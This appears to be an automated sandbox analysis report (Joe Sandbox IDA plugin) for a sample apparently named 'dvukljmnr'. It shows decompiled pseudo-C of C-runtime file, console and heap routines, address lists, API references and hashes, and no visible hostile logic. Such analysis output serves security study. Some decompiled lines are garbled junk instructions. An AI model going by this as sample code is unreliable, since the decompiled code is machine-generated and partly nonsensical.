                                                          											_t318 =  *_t413;
                                                          											__eflags = _t318 - 0x1a;
                                                          											if(_t318 == 0x1a) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t318 - _t383;
                                                          											if(_t318 == _t383) {
                                                          												__eflags = _t413 -  *(_t426 - 0x1c) - 1;
                                                          												if(_t413 >=  *(_t426 - 0x1c) - 1) {
                                                          													_push(0);
                                                          													_t413 = _t413 + 1;
                                                          													__eflags = _t413;
                                                          													_push(_t426 - 0x14);
                                                          													_push(1);
                                                          													 *((intOrPtr*)(_t426 - 0x74af00bb)) =  *((intOrPtr*)(_t426 - 0x74af00bb)) + _t383;
                                                          													asm("pushfd");
                                                          													_t355 = _t355 + _t355;
                                                          													_t327 = ReadFile(??, ??, ??, ??, ??);
                                                          													__eflags = _t327;
                                                          													if(_t327 != 0) {
                                                          														L56:
                                                          														__eflags =  *(_t426 - 0x14);
                                                          														if( *(_t426 - 0x14) == 0) {
                                                          															goto L71;
                                                          														}
                                                          														_t391 =  *(_t426 - 0xc);
                                                          														_t328 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          														__eflags =  *(_t328 + _t355 + 4) & 0x00000048;
                                                          														if(( *(_t328 + _t355 + 4) & 0x00000048) == 0) {
                                                          															__eflags = _t421 -  *(_t426 - 0x10);
                                                          															if(__eflags != 0) {
                                                          																L68:
                                                          																E009B3F56(_t383, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xffffffff, 0xffffffff, 1);
                                                          																_t391 =  *(_t426 - 0xc);
                                                          																_t428 = _t428 + 0x10;
                                                          																_t330 = 0xa;
                                                          																__eflags =  *((intOrPtr*)(_t426 - 1)) - _t330;
                                                          																if( *((intOrPtr*)(_t426 - 1)) == _t330) {
                                                          																	L64:
                                                          																	_push(0xd);
                                                          																	L65:
                                                          																	_pop(_t383);
                                                          																	goto L66;
                                                          																}
                                                          																_t383 = 0xd;
                                                          																 *_t421 = _t383;
                                                          																L70:
                                                          																_t421 = _t421 + 1;
                                                          																goto L66;
                                                          															}
                                                          															_t331 = 0xa;
                                                          															__eflags =  *((intOrPtr*)(_t426 - 1)) - _t331;
                                                          															if(__eflags != 0) {
                                                          																goto L68;
                                                          															}
                                                          															 *_t421 = _t331;
                                                          															_t421 = _t421 + 1;
                                                          															__eflags = _t421;
                                                          															goto L64;
                                                          														}
                                                          														_t332 = 0xa;
                                                          														_push(0xd);
                                                          														__eflags =  *((intOrPtr*)(_t426 - 1)) - _t332;
                                                          														if( *((intOrPtr*)(_t426 - 1)) != _t332) {
                                                          															 *_t421 = 0xd;
                                                          															_t421 = _t421 + 1;
                                                          															 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *((intOrPtr*)(_t426 - 1));
                                                          														} else {
                                                          															 *_t421 = _t332;
                                                          															_t421 = _t421 + 1;
                                                          														}
                                                          														goto L65;
                                                          													} else {
                                                          														_t334 = GetLastError();
                                                          														__eflags = _t334;
                                                          														if(_t334 != 0) {
                                                          															L71:
                                                          															_t391 =  *(_t426 - 0xc);
                                                          															_t383 = 0xd;
                                                          															 *_t421 = _t383;
                                                          															_t421 = _t421 + 1;
                                                          															L66:
                                                          															__eflags = _t413 -  *(_t426 - 0x1c);
                                                          															if(_t413 <  *(_t426 - 0x1c)) {
                                                          																continue;
                                                          															}
                                                          															goto L75;
                                                          														}
                                                          														goto L56;
                                                          													}
                                                          												}
                                                          												_t98 = _t413 + 1; // 0x9b2b48
                                                          												_t335 = _t98;
                                                          												__eflags =  *_t335 - 0xa;
                                                          												if( *_t335 != 0xa) {
                                                          													 *_t421 = _t383;
                                                          													_t413 = _t335;
                                                          													_t421 = _t421 + 1;
                                                          													goto L66;
                                                          												}
                                                          												_t336 = 0xa;
                                                          												_t413 = _t413 + 2;
                                                          												 *_t421 = _t336;
                                                          												goto L70;
                                                          											}
                                                          											 *_t421 = _t318;
                                                          											_t421 = _t421 + 1;
                                                          											_t413 = _t413 + 1;
                                                          											goto L66;
                                                          										}
                                                          										_t384 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          										_t319 =  *(_t384 + _t355 + 4);
                                                          										__eflags = _t319 & 0x00000040;
                                                          										if((_t319 & 0x00000040) != 0) {
                                                          											 *_t421 =  *_t413;
                                                          											_t421 = _t421 + 1;
                                                          											__eflags = _t421;
                                                          										} else {
                                                          											 *(_t384 + _t355 + 4) = _t319 | 0x00000002;
                                                          										}
                                                          										goto L75;
                                                          									}
                                                          									__eflags =  *( *(_t426 - 0x10)) - 0xa;
                                                          									if( *( *(_t426 - 0x10)) != 0xa) {
                                                          										goto L43;
                                                          									}
                                                          									_t297 = _t265 | 0x00000004;
                                                          									goto L44;
                                                          								}
                                                          								L29:
                                                          								_t259 = GetLastError();
                                                          								L30:
                                                          								E009AF0DF(_t259);
                                                          								goto L31;
                                                          							}
                                                          						}
                                                          					}
                                                          					if(( !__esi & 0x00000001) == 0) {
                                                          						L2:
                                                          						 *(E009AF0CC()) =  *_t248 & _t403;
                                                          						 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						_t250 = E009AEB1E();
                                                          						L162:
                                                          						_t251 = _t250 | 0xffffffff;
                                                          						__eflags = _t251;
                                                          						goto L163;
                                                          					} else {
                                                          						_t415 = __esi & 0xfffffffe;
                                                          						goto L7;
                                                          					}
                                                          				}
                                                          			}



































































































                                                          0x00000000
                                                          0x00000000
                                                          0x009afd94
                                                          0x009afd97
                                                          0x009afda7
                                                          0x009afda9
                                                          0x009afdab
                                                          0x009afdb0
                                                          0x009afdb1
                                                          0x009afdb4
                                                          0x009afdb8
                                                          0x009afdba
                                                          0x009afdba
                                                          0x009afdbb
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afd99
                                                          0x009afd99
                                                          0x009afd9c
                                                          0x009afd9f
                                                          0x009afd9f
                                                          0x009afdc1
                                                          0x009afdc3
                                                          0x00000000
                                                          0x009afdc5
                                                          0x00000000
                                                          0x009afdc5
                                                          0x009afdc3
                                                          0x009afdca
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x00000000
                                                          0x009afdd1
                                                          0x009afaf9
                                                          0x009afafb
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb0b
                                                          0x009afb0b
                                                          0x009afb0f
                                                          0x009afb12
                                                          0x009afb14
                                                          0x009afb17
                                                          0x009afb1a
                                                          0x009afb1d
                                                          0x009afb1f
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3a
                                                          0x009afc3e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc44
                                                          0x009afc46
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc4f
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc85
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd27
                                                          0x009afd29
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd34
                                                          0x009afd36
                                                          0x009afd39
                                                          0x009afd39
                                                          0x009afd42
                                                          0x00000000
                                                          0x009afd42
                                                          0x009afc98
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afa8c
                                                          0x00000000
                                                          0x009afa8c
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x009afc82
                                                          0x00000000
                                                          0x009afc82
                                                          0x009afc53
                                                          0x00000000
                                                          0x009afc53
                                                          0x009afb27
                                                          0x009afb28
                                                          0x009afb2a
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb7c
                                                          0x009afb82
                                                          0x009afb84
                                                          0x009afb90
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb99
                                                          0x009afba0
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x009afbda
                                                          0x009afbda
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x00000000
                                                          0x009afbdc
                                                          0x009afc06
                                                          0x009afc07
                                                          0x009afc09
                                                          0x009afc09
                                                          0x00000000
                                                          0x009afc09
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x00000000
                                                          0x009afbd9
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbac
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x00000000
                                                          0x009afb86
                                                          0x009afb86
                                                          0x009afb8c
                                                          0x009afb8e
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x009afbdd
                                                          0x009afbdd
                                                          0x009afbe0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbe6
                                                          0x00000000
                                                          0x009afb8e
                                                          0x009afb84
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x00000000
                                                          0x009afb62
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x00000000
                                                          0x009afb57
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb3b
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x00000000
                                                          0x009afc24
                                                          0x009afb00
                                                          0x009afb03
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb05
                                                          0x00000000
                                                          0x009afb05
                                                          0x009afa7c
                                                          0x009afa7c
                                                          0x009afa82
                                                          0x009afa83
                                                          0x00000000
                                                          0x009afa88
                                                          0x009afa51
                                                          0x009afa2f
                                                          0x009af913
                                                          0x009af8f0
                                                          0x009af8f5
                                                          0x009af8d0
                                                          0x009affcc
                                                          0x009affd1
                                                          0x009affd1
                                                          0x009affd1
                                                          0x00000000
                                                          0x009af915
                                                          0x009af915
                                                          0x00000000
                                                          0x009af915
                                                          0x009af913

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009AF933
                                                          • GetConsoleMode.KERNEL32 ref: 009AFA46
                                                          • ReadConsoleW.KERNEL32(?,?,009B2B47,?,00000000), ref: 009AFA72
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?), ref: 009AFA7C
                                                          • __dosmaperr.LIBCMT ref: 009AFA83
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                                                          • String ID:
                                                          • API String ID: 3470617983-0
                                                          • Opcode ID: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction ID: 992db9ccb05113db84f02c962f3552eadaae0e2fcbb6f8b591836f2c90ec76f2
                                                          • Opcode Fuzzy Hash: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction Fuzzy Hash: 2141EA70E146858ECB26CFDC9C64BE9BBA9AB47314F054175EC588B2A2D730CD0AC7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E009A6AE8(void* __ebx, signed int __edx) {
                                                          				intOrPtr _t43;
                                                          				void* _t55;
                                                          				signed int _t69;
                                                          				signed int _t70;
                                                          				signed int _t75;
                                                          				intOrPtr _t77;
                                                          				signed int _t82;
                                                          				void* _t83;
                                                          
                                                          				_t75 = __edx;
                                                          				_t61 = __ebx;
                                                          				_t86 = __ebx;
                                                          				if(__ebx == 0) {
                                                          					L24:
                                                          					return E009AF225(_t77);
                                                          				} else {
                                                          					memcpy(__ebx,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68), 0x88 << 2);
                                                          					_t82 = 0;
                                                          					 *__ebx = 0;
                                                          					_t77 = E009B48E9(_t75,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68) + 0x110, _t86,  *((intOrPtr*)(_t83 + 8)), __ebx);
                                                          					 *((intOrPtr*)(_t83 + 8)) = _t77;
                                                          					if(_t77 != 0) {
                                                          						__eflags = _t77 - 0xffffffff;
                                                          						if(_t77 == 0xffffffff) {
                                                          							__eflags = __ebx - 0x9ceac8;
                                                          							if(__ebx != 0x9ceac8) {
                                                          								E009B2248(__ebx);
                                                          							}
                                                          							 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						}
                                                          						goto L24;
                                                          					}
                                                          					_t43 =  *((intOrPtr*)(_t83 - 0x20));
                                                          					asm("lock xadd [ecx], edx");
                                                          					if((_t75 | 0xffffffff) == 0) {
                                                          						_t73 =  *(_t43 + 0x68);
                                                          						if( *(_t43 + 0x68) != 0x9ceac8) {
                                                          							E009B2248(_t73);
                                                          							_t43 =  *((intOrPtr*)(_t83 - 0x20));
                                                          						}
                                                          					}
                                                          					 *(_t43 + 0x68) = _t61;
                                                          					asm("lock xadd [ebx], eax");
                                                          					if(( *( *((intOrPtr*)(_t83 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0x9cee10 & 0x00000001) == 0) {
                                                          						E009B20A9(0xd);
                                                          						 *(_t83 - 4) = _t82;
                                                          						 *0x9cfcd4 =  *((intOrPtr*)(_t61 + 4));
                                                          						 *0x9cfcd8 =  *((intOrPtr*)(_t61 + 8));
                                                          						 *0x9cfce8 =  *((intOrPtr*)(_t61 + 0x21c));
                                                          						_t69 = _t82;
                                                          						while(1) {
                                                          							 *(_t83 - 0x1c) = _t69;
                                                          							if(_t69 >= 5) {
                                                          								break;
                                                          							}
                                                          							 *((short*)(0x9cfcdc + _t69 * 2)) =  *((intOrPtr*)(_t61 + 0xc + _t69 * 2));
                                                          							_t69 = _t69 + 1;
                                                          						}
                                                          						_t70 = _t82;
                                                          						while(1) {
                                                          							 *(_t83 - 0x1c) = _t70;
                                                          							__eflags = _t70 - 0x101;
                                                          							if(_t70 >= 0x101) {
                                                          								goto L14;
                                                          							}
                                                          							 *((char*)(_t70 + 0x9ce8c0)) =  *((intOrPtr*)(_t70 + _t61 + 0x18));
                                                          							_t70 = _t70 + 1;
                                                          						}
                                                          						while(1) {
                                                          							L14:
                                                          							 *(_t83 - 0x1c) = _t82;
                                                          							__eflags = _t82 - 0x100;
                                                          							if(_t82 >= 0x100) {
                                                          								break;
                                                          							}
                                                          							 *((char*)(_t82 + 0x9ce9c8)) =  *((intOrPtr*)(_t82 + _t61 + 0x119));
                                                          							_t82 = _t82 + 1;
                                                          						}
                                                          						__eflags = _t70 | 0xffffffff;
                                                          						asm("lock xadd [eax], ecx");
                                                          						if((_t70 | 0xffffffff) == 0) {
                                                          							_t55 =  *0x9cecec; // 0x471778
                                                          							__eflags = _t55 - 0x9ceac8;
                                                          							if(_t55 != 0x9ceac8) {
                                                          								E009B2248(_t55);
                                                          							}
                                                          						}
                                                          						 *0x9cecec = _t61;
                                                          						asm("lock xadd [ebx], eax");
                                                          						 *(_t83 - 4) = 0xfffffffe;
                                                          						E009B48B3();
                                                          					}
                                                          					goto L24;
                                                          				}
                                                          			}












                                                          APIs
                                                          • __setmbcp_nolock.LIBCMT ref: 009B47A3
                                                            • Part of subcall function 009B48E9: getSystemCP.LIBCMT ref: 009B4901
                                                            • Part of subcall function 009B48E9: setSBCS.LIBCMT ref: 009B490E
                                                          • _free.LIBCMT ref: 009B47D2
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • __lock.LIBCMT ref: 009B4801
                                                          • _free.LIBCMT ref: 009B488F
                                                          • _free.LIBCMT ref: 009B48CC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLastSystem__lock__setmbcp_nolock
                                                          • String ID:
                                                          • API String ID: 2025676541-0
                                                          • Opcode ID: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction ID: 15082d5e1f2e5f5613b2308eabd6146c6695541089bec513520f9c58288ead37
                                                          • Opcode Fuzzy Hash: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction Fuzzy Hash: 2F41F574D542848FDB15DF68D9C0BE877E8FB45330B24416DE8669B693CB388C42EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E009B6902(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				intOrPtr* _t9;
                                                          				intOrPtr* _t12;
                                                          				void* _t20;
                                                          				long _t31;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t31 = _a8;
                                                          					if(_t31 != 0) {
                                                          						_push(__ebx);
                                                          						while(_t31 <= 0xffffffe0) {
                                                          							if(_t31 == 0) {
                                                          								_t31 = _t31 + 1;
                                                          							}
                                                          							_t7 = HeapReAlloc( *0x9cf22c, 0, _a4, _t31);
                                                          							_t20 = _t7;
                                                          							if(_t20 != 0) {
                                                          								L17:
                                                          								_t8 = _t20;
                                                          							} else {
                                                          								if( *0x9d0060 == _t7) {
                                                          									_t9 = E009AF100();
                                                          									 *_t9 = E009AF159(GetLastError());
                                                          									goto L17;
                                                          								} else {
                                                          									if(E009B4C7E(_t7, _t31) == 0) {
                                                          										_t12 = E009AF100();
                                                          										 *_t12 = E009AF159(GetLastError());
                                                          										L12:
                                                          										_t8 = 0;
                                                          									} else {
                                                          										continue;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						E009B4C7E(_t6, _t31);
                                                          						 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          						goto L12;
                                                          					} else {
                                                          						E009B2248(_a4);
                                                          						_t8 = 0;
                                                          					}
                                                          					L14:
                                                          					return _t8;
                                                          				} else {
                                                          					return E009B6870(__ebx, __edx, __edi, _a8);
                                                          				}
                                                          			}










                                                          APIs
                                                          • _malloc.LIBCMT ref: 009B690E
                                                            • Part of subcall function 009B6870: __FF_MSGBANNER.LIBCMT ref: 009B6887
                                                            • Part of subcall function 009B6870: __NMSG_WRITE.LIBCMT ref: 009B688E
                                                            • Part of subcall function 009B6870: RtlAllocateHeap.NTDLL(00440000,00000000,00000001,00000000,00000000,00000000,?,009B22DE,00000000,00000000,00000000,00000000,?,009B2193,00000018,009CC228), ref: 009B68B3
                                                          • _free.LIBCMT ref: 009B6921
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 1020059152-0
                                                          • Opcode ID: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction ID: 580ec1b5ae87a2f4d2080605421722227a8d25995727818da3d88966004fae7a
                                                          • Opcode Fuzzy Hash: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction Fuzzy Hash: B811C63281D215EFCB212FB0EE147EA3B98AF453B0F204539F949DA161DB38A84096D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E009A6016(signed char __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				long _t30;
                                                          				signed int _t37;
                                                          				signed int _t40;
                                                          				signed int _t48;
                                                          				void* _t50;
                                                          				signed int _t52;
                                                          				void* _t53;
                                                          				void* _t56;
                                                          				signed int _t57;
                                                          				void* _t58;
                                                          
                                                          				_t56 = __esi;
                                                          				_t53 = __edi;
                                                          				_t50 = __edx;
                                                          				_t42 = __ebx;
                                                          				if(__eflags != 0) {
                                                          					_t42 = __ebx + 0x20;
                                                          				}
                                                          				if(( *(_t58 + 0xc) & 0x00004000) != 0) {
                                                          					_t42 = _t42 | 0x00000080;
                                                          				}
                                                          				if(( *(_t58 + 0xc) & 0x00000080) != 0) {
                                                          					_t42 = _t42 | 0x00000010;
                                                          				}
                                                          				_t30 = GetFileType( *(_t58 + 8));
                                                          				if(_t30 != 0) {
                                                          					__eflags = _t30 - 2;
                                                          					if(__eflags != 0) {
                                                          						__eflags = _t30 - 3;
                                                          						if(__eflags == 0) {
                                                          							_t42 = _t42 | 0x00000008;
                                                          							__eflags = _t42;
                                                          						}
                                                          					} else {
                                                          						_t42 = _t42 | 0x00000040;
                                                          					}
                                                          					_t57 = E009B3A06(_t42, _t50, _t53, _t56, __eflags);
                                                          					 *(_t58 + 0xc) = _t57;
                                                          					__eflags = _t57 - 0xffffffff;
                                                          					if(_t57 != 0xffffffff) {
                                                          						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                          						E009B3DB2(_t57,  *(_t58 + 8));
                                                          						_t52 = _t57 >> 5;
                                                          						_t48 = (_t57 & 0x0000001f) << 6;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 4) = _t42 | 0x00000001;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x00000080;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x0000007f;
                                                          						 *((intOrPtr*)(_t58 - 0x1c)) = 1;
                                                          						 *(_t58 - 4) = 0xfffffffe;
                                                          						E009B3D8D(1, _t57);
                                                          						__eflags = 1;
                                                          						if(1 == 0) {
                                                          							_t57 = _t57 | 0xffffffff;
                                                          							__eflags = _t57;
                                                          						}
                                                          						_t37 = _t57;
                                                          					} else {
                                                          						 *((intOrPtr*)(E009AF100())) = 0x18;
                                                          						_t40 = E009AF0CC();
                                                          						 *_t40 =  *_t40 & 0x00000000;
                                                          						goto L9;
                                                          					}
                                                          				} else {
                                                          					_t40 = E009AF0DF(GetLastError());
                                                          					L9:
                                                          					_t37 = _t40 | 0xffffffff;
                                                          				}
                                                          				return E009AF225(_t37);
                                                          			}














                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                          • String ID:
                                                          • API String ID: 43408053-0
                                                          • Opcode ID: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction ID: 9e8aab5806c284d91b9b5f50a4a9beef4495bb816137996ca4eef90094ce3e9b
                                                          • Opcode Fuzzy Hash: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction Fuzzy Hash: E4212B319195106ACB21DBB8DE157E87F545F81334F28C718E8B15B2E3C7389B06AB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 80%
                                                          			E009A2695(void* __eax, signed char __ecx, signed int __edx, signed int* __edi) {
                                                          				intOrPtr _t33;
                                                          				intOrPtr _t36;
                                                          				intOrPtr _t48;
                                                          				signed char _t50;
                                                          				signed char _t63;
                                                          				signed int _t65;
                                                          				signed int _t67;
                                                          				signed int* _t68;
                                                          				void* _t73;
                                                          				void* _t80;
                                                          
                                                          				_t68 = __edi;
                                                          				_t50 = __ecx;
                                                          				_t63 = __edx ^ __edx;
                                                          				asm("pushfd");
                                                          				_t1 = _t63 + 0x24243244;
                                                          				 *_t1 =  *((intOrPtr*)(_t63 + 0x24243244)) + __ecx;
                                                          				if( *_t1 <= 0) {
                                                          					asm("enter 0x4c88, 0x32");
                                                          					_t80 = _t73 - 1;
                                                          					asm("adc al, 0x38");
                                                          					_pop(_t73);
                                                          				}
                                                          				asm("std");
                                                          				if(_t80 == 0 && (_t50 & 0x00000008) != 0) {
                                                          					 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) | 0x00000020;
                                                          					_t50 =  *(_t73 + 0x14);
                                                          				}
                                                          				_t70 =  *(_t73 - 8);
                                                          				if(( *(_t73 - 8) & 0xc0000000) == 0xc0000000) {
                                                          					_t84 = _t50 & 0x00000001;
                                                          					if((_t50 & 0x00000001) != 0) {
                                                          						CloseHandle( *(_t73 - 0x1c));
                                                          						_t36 = E009B23DE(_t50, _t84,  *((intOrPtr*)(_t73 + 0x10)), _t70 & 0x7fffffff,  *((intOrPtr*)(_t73 - 0xc)), _t73 - 0x38, 3,  *((intOrPtr*)(_t73 - 0x18)),  *((intOrPtr*)(_t73 - 0x10)));
                                                          						if(_t36 != 0xffffffff) {
                                                          							_t65 =  *_t68;
                                                          							_t67 = (_t65 & 0x0000001f) << 6;
                                                          							__eflags = _t67;
